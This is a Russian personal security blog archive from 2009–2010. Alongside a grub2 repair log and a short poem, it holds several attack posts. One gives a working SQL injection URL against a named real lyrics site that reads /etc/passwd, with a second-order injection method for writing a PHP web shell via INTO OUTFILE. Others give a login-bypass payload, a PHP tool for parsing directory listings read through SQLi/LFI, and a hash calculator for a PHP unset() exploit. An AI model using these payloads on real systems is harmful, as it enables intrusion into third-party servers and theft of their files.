Мой Карфаген

2010-04-06T19:02:00.000+04:00

gnome-blog апплет

Поставил себе этот апплет. Собственно эта запись и является тестированием апплета. Настроек минимум да и вообще, этот апплет я думаю мне не подойдет, так как я хочу делать упор на объем каждой записи, а не на их количество. Наверное это ужасно удобная штука для тех кто публикует свои мысли и переживания... Нет, все же мне это не подходит

grub2 блин

2010-04-06T11:29:00.005+04:00

Решил поставить на Ubuntu 9.10 grub2. Сложного ничего нет, вроде как, набрал:

sudo apt-get grub-pc

Со всем согласился, перезагрузился , при перезагрузке проверил, что все встало норм, осталось только закрепить. Я набрал в консольке:

sudo upgrade-from-grub-legacy

А дальше начал бездумно и не читая тыкать на "ОК", компьютер вроде как умный и сам все знает. При этом забыл поставить... ммм... "галочку" при выборе устройства на котором grub2 пропишется (а всего то нужно было /dev/sda выбрать). Перезагрузился, ну и словил ошибку

Error 15:чтототам

Немного расстроился так как время было 6 утра и хотелось спать. LiveCD не нашел (у меня вообще бардак в связи с ремонтом, хотя может просто... бардак) Зато нашел dvd с Kubuntu старенькой, чему несказанно и опрометчиво обрадовался. Вобщем загрузился я вернее Kubuntu. Попробовал премонтировать диск с KK, набрал:

sudo fdisk -l

увидел то, что мне нужно:

Устр-во Загр Начало Конец Блоки Id Система /dev/sda1 1 784 6297448+ 83 Linux /dev/sda2 * 785 6273 44086392 7 HPFS/NTFS /dev/sda3 6273 12848 52814017 7 HPFS/NTFS /dev/sda4 12849 19457 53086792+ 5 Расширенный /dev/sda5 12849 19181 50869791 83 Linux /dev/sda6 19182 19457 2216938+ 82 Linux своп / Solaris

и попробовал примонтировать:

sudo mount /dev/sda1 /mnt

на что кубанточка выплюнула несогласие с fs /dev/sda1:

unknown filesystem type 'ext4'

Пришлось качать образ с оф сайта:

http://www.ubuntu.com/getubuntu/download

Но как назло не нашел живой болванки, а бежать в магазин в 7 утра было совсем влом. Благо дело нашел флешку. Потом скачал замечательную программу UNetbootin c

http://sourceforge.net/projects/unetbootin/files/UNetbootin/429/unetbootin-windows-429.exe/download

И создал LiveUSB. Загрузившись с нее я сдури примонтировал sda1:

sudo mount /dev/sda1 /mnt

и попытался сделать chroot /mnt, на это был послан chroot`ом в задницу по причине того что /bin/bash он не нашел. Все было просто, я не посмотрел на размер раздела и примонтировал раздел с... порнухой (это шутка). Вышел из chroot, отмонтировал все что не нужно) примонтировал то что нужно:

sudo mount /dev/sda5 /mnt

и создал синонимы текущих устройств в примонтированном разделе:

sudo mount --bind /dev/ /mnt/dev

тут уже chroot заработал:

sudo chroot /mnt

дальше выполнил команду

grub-install /dev/sda

В интернетах рекомендуют выполнить:

grub-install --recheck /dev/sda

но мне оно не понадобилось. Перезагрузился и о чудо все заработало, правда винды не было видно. Зайдя в родную Ubuntu я в терминале набрал

sudo update-grub

И после перезагрузки винда в меню grub`а появилась.

ЗЫ Этой заметкой я не хотел показать какие у меня кривые руки, я просто хотел написать правду ;)

Странно

2010-02-21T19:00:00.004+03:00

Все хочу вести блог, но все не хватает времени. Недавно увидел исходники одного интересующего меня сайта, ну просто повезло... Это действительно было забавно, он использовал скрипт (ну что-то типа модуля), который обеспечивал возможность Basic HTTP аутентификации пользователей которые занесены в БД, конечно об авторизации не было и речи, если внутри, то ужо одминчег. Забавно то, что скрипт проверял включена ли опция magic_quotes_gpc и если она выключена, то _SERVER['PHP_AUTH_USER'] экранируется с помощью mysql_escape_string() , это все конечно уязвимо при использовании двухбайтных кодировок (например китайской BIG5), кстати первый раз я встретил возможностьб обойти экранирование на сайте www.2checkout.com, сильно не правда ли (сильно, это я про значимость сайта)? Потом увидел статью Elekta и все стало понятно. Но смысл не в этом, смысл в том что если magic_quotes_gpc включена, то и обрабатывать данные не стоит, по мнению авторов. Даже буквы gpc на конце говорят про то, что обрабатывается только массив _REQUEST, вернее массивы_GET, _POST и _COOKIE. Кодеры!!! куда вы смотрите?!!! Пора забыть про такие элементарные ошибки, когда вся суть проникнуть в панель администратора заключается в том, что в поле логин нужно ввести:"asasasas' union select 1 -- 11" а в поле пароль:"1". Давайте не будем позориться)

UFS каталоги

2009-11-09T19:37:00.006+03:00

Вот нашел структуру каталога в UFS. Блин, а я реверсил. Радует только то, что понял я тогда все правильно. Вот как это выглядит в файле ufs_fs.h

struct ufs_dir_entry {

        __u32  d_ino;                           ///inode number of this entry
       __u16  d_reclen;                        ///length of this entry
       union {
                __u16   d_namlen;              ///actual length of d_name
                struct {
                          __u8    d_type;      ///file type
                          __u8    d_namlen;    ///length of string in d_name
                        } d_44;
               } d_u;
       __u8    d_name[UFS_MAXNAMLEN + 1];     ///file name
};

навеяло, блин

2009-08-19T07:11:00.003+04:00

Кому то Whisky, кому то Whiskas.
Кому то бабы, кому то киски.
Кому то просто, сидеть и хекать
Кому то, сцуко, орать и бегать.

Ах, да, забыл, у меня же труъ секурный блог, больше такого не будет, просто животное достало!

Вычисляем hash_del_key

2009-08-17T08:55:00.004+04:00

Скрипт от меня, для вычисления hash_del_key который требуется при использовании баги связанной с unset()

<?php

        //вычисление hash_del_key для переменных php4 и php5
           $h = 5381;
           $st='s';//здесь имя переменной для которой считать хеш
           for ($i=0;$i<strlen($st)+1;$i++)
        {
                       $h += ($h << 5);
          $h ^= ord($st[$i]);
        }
           echo "hash_del_key_php4: $h";//вывод хеша php4

           $h = 5381;
    for ($i=0;$i<strlen($st)+1;$i++)
                    {
                      $h += ($h << 5);
         $h += ord($st[$i]);
                     }
           echo "hash_del_key_php5: $h";//вывод хеша php5
?>

1 АПРЕЛЯ!!!

2009-04-01T03:26:00.004+04:00

Н. В. Гоголю исполнилось бы 200 лет. Но что такое 200 лет по сравнению с вечностью, ибо Гоголь вечен.
Гугл как всегда не остался в стороне от такого события, такой даты:

Парсинг файла каталога UFS и иже с ними

2009-04-01T02:21:00.016+04:00

Как выяснилось при чтении каталога в Файловой Системе UFS/UFS2 (c которыми работают ОС *BSD и SunOS) не возникает ошибки и мы можем увидеть не содержимое каталога в традиционном понимании, а содержимое файла, коим по сути и является каталог. Другими словами при проведении SQL инъекции с возможностью чтения файлов или Lfi (Local file including) можно читать не только содержимое файлов, но и содержимое каталогов. Собственно скрипт представленный ниже для этого и нужен. Функционал прост, в поле вводим URL с уязвимостью позволяющей прочитать каталог и видим результат. Еще раз повторюсь что работает только с ОС работающими c UFS (*BSD и SunOS)

<html>
<head>
<title>Парсинг каталогов FreeBSD от Scipio</title>
</head>
<body>
<?php
error_reporting(0);
set_time_limit(0);
if (isset($_POST['pole'])){$pole=$_POST['pole']; $fl=file_get_contents($pole);} else $pole='';
?>
<form method="post" action="<?=$_SERVER['SCRIPT_NAME']?>">
<input type="text" size="150" name="pole" value="<?=$pole?>"/>
</form>
<?php
if (!empty($fl))
{
$s=bin2hex ($fl);
$ln=strlen($s)-5;
$nam=FALSE;
for ($i=0;$i<$ln;$i+=2)
   {       $curhex=substr($s,$i,3);
       $nexthex=substr($s,$i+4,1);
       if (($curhex=='040') and ($nexthex>'1') and ($nexthex<'8'))
           {
            $pob="<br>".'<b>[DIR]</b> ';
            $nam=TRUE;
            $i+=4;
           }

       if (($curhex=='080') and ($nexthex>'1') and ($nexthex<'8'))
           {
            $pob="<br>".'[FILE] ';
            $nam=TRUE;
            $i+=4;
           }
        if (($curhex=='0a0') and ($nexthex>'1') and ($nexthex<'8'))
           {
            $pob="<br>".'<i>[LINK]</i> ';
            $nam=TRUE;
            $i+=4;
           }
       if ($nam===TRUE)
           {
            if (($s[$i]>'1') and ($s[$i]<'8'))
                {
                 $hx=substr($s,$i,2);
              $hx=chr(hexdec($hx));
              $pob=$pob.$hx;
             }
         else {echo $pob; $nam=FALSE;}
        }
   }
}
?>
</body>
</html>

Двойные запросы

2009-03-31T19:07:00.045+04:00

Есть MySQL инъекция:

http://www.thefump.com/lyrics.php?id=-99999+union+select+1,load_file(0x2f6574632f706173737764),3,4,USER(),6,7,8,9,10,VERSION(),12,13/*

смысл в том, что текущий пользователь БД root и как видно file_priv есть, но казалось бы шелл через into outfile залить нельзя, так как экранируются кавычки, на самом деле шелл здесь (и в подобных скулях) через into outfile залить не сложно.

К теории, есть например такой скрипт:

<?php

mysql_connect('localhost','root','');
mysql_select_db('intbrd');
$id=$_GET["id"];
$sql = "SELECT u_id,u__email,u__name FROM `User` where u_id=".$id;
$result = MySQL_QUERY($sql);
echo mysql_error();
while($us = MySQL_FETCH_ARRAY($result))
{
echo $us['u__email'].":".$us['u__name'];echo "<br>";
  $onl = MySQL_QUERY("SELECT o_uid,o_key FROM online WHERE o_uid = ".$us["u_id"]);
while($usonl = MySQL_FETCH_ARRAY($onl))
echo $usonl["o_uid"].':'.$usonl["o_key"];
}
?>

(набросал я его чисто для наглядности и примера и показываю на примере своей бд)

обратившись к скрипту:

http://localhost/erase.php?id=-2+union+select+1,2,3/*

видим:

2:3

обратившись:

http://localhost/erase.php?id=-2+union+select+0x27,2,3/*

(0x27- код кавычки) видим:

2:3

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in Z:\home\localhost\www\erase.php on line 20

происходит это потому, что данные, полученные из первого запроса, вставляются во второй запрос.

Сделаем "внутренний" инъект-запрос:

-2 union select '999',111/*

захексим его и подставим в первое поле первого ("внешнего") запроса:

http://localhost/erase.php?id=-2+union+select+0x2D3220756E696F6E2073656C6563742027393939272C3131312F2A,2,3/*

результат:

2:3
999:111

т.к. данные полученные из sql-запроса не так часто слешируют/фильтруют то получается что этот "внутренний" запрос выполняется без ошибок, даже при наличии кавычек.

Если "внутренний" запрос будет:

-2 union select '<?php include "shell.php"; ?>,111 into outfile '/bla/bla/bla.php'/*

то в запросе

$onl = MySQL_QUERY("SELECT o_uid,o_key FROM online WHERE o_uid = ".$us["u_id"])

он выполнится без проблем даже при magic_quotes on

Обратимся к первой инъекции, если мы в третье поле подставим:

-1 union select 'magic_qotes is sux'/*

и выполним:

http://www.thefump.com/lyrics.php?id=-99999+union+select+1,2,0x2D3120756E696F6E2073656C65637420276D616769635F716F74657320697320737578272F2A,4,5,6,7,8,9,10,11,12,13/*

увидим безобидную надпись magic_qotes is sux
а могли бы составить и более опасный запрос с присутствием into outfile 'blabla' и он тоже бы выполнился.

Мой блог

2009-03-31T16:40:00.002+04:00

Вот решил создать блог, не знаю зачем мне это нужно:

...Из-за ленности, из-за праздности,
А быть может от воздержания...

Ну, посмотрим, что из этого всего получится...